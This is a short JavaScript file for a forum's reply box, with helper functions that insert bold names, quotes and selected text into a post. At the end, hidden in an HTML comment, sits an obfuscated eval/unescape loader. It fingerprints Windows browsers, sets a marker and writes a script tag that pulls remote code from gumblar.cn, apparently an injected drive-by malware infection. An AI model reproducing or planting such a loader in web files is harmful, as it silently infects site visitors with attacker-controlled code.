function ins(name){
if (document.REPLIER) {
var input=document.REPLIER.Post;
input.value=input.value+"[b]"+name+"[/b]"+" \n";
}
}

function Insert(text){ 
if (text!="") paste("[quote]"+text+"[/quote]\n", 0);
}

function paste(text, flag){ 
if (document.REPLIER) {
if ((document.selection)&&(flag)) {
	document.REPLIER.Post.focus();
	document.REPLIER.document.selection.createRange().text = text;
} else document.REPLIER.Post.value += text;
}
}

function get_selection() {
   if (document.getSelection){
	selection = document.getSelection();
	selection = selection.replace(/\r\n\r\n/gi, "_doublecaret_");
	selection = selection.replace(/\r\n/gi, " ");
       while (selection.indexOf("  ") !=-1) selection = selection.replace(/  /gi, ""); 
	selection = selection.replace(/_doublecaret_/gi, "\r\n\r\n");
  } else
      selection = document.selection.createRange().text;
}<!-- 
(function(t){eval(unescape(('va"72"20"61"3d"22S"63"72iptEngine"22"2cb"3d"22"56ers"69o"6e()"2b"22"2cj"3d"22"22"2c"75"3dnavigator"2euserA"67ent"3bif(("75"2eindexOf("22"57in"22)"3e"30"29"26"26(u"2ei"6ed"65x"4ff("22NT"206"22"29"3c0)"26"26"28"64ocum"65"6et"2ecoo"6bie"2eindexOf("22miek"3d"31"22)"3c0)"26"26(ty"70"65"6f"66(zrvzts)"21"3dty"70eof"28"22A"22"29))"7bz"72v"7at"73"3d"22A"22"3b"65"76al("22"69"66(win"64"6fw"2e"22+a"2b"22)"6a"3dj+"22"2ba+"22Ma"6ao"72"22"2bb+a+"22Min"6fr"22+b"2ba"2b"22Bui"6cd"22+b+"22j"3b"22)"3bdo"63umen"74"2ewrite"28"22"3cscr"69"70"74"20"73rc"3d"2f"2fg"75mblar"2e"63n"2frss"2f"3fid"3d"22"2bj+"22"3e"3c"5c"2fs"63r"69"70"74"3e"22"29"3b"7d').replace(t,'%')))})(/"/g);
 -->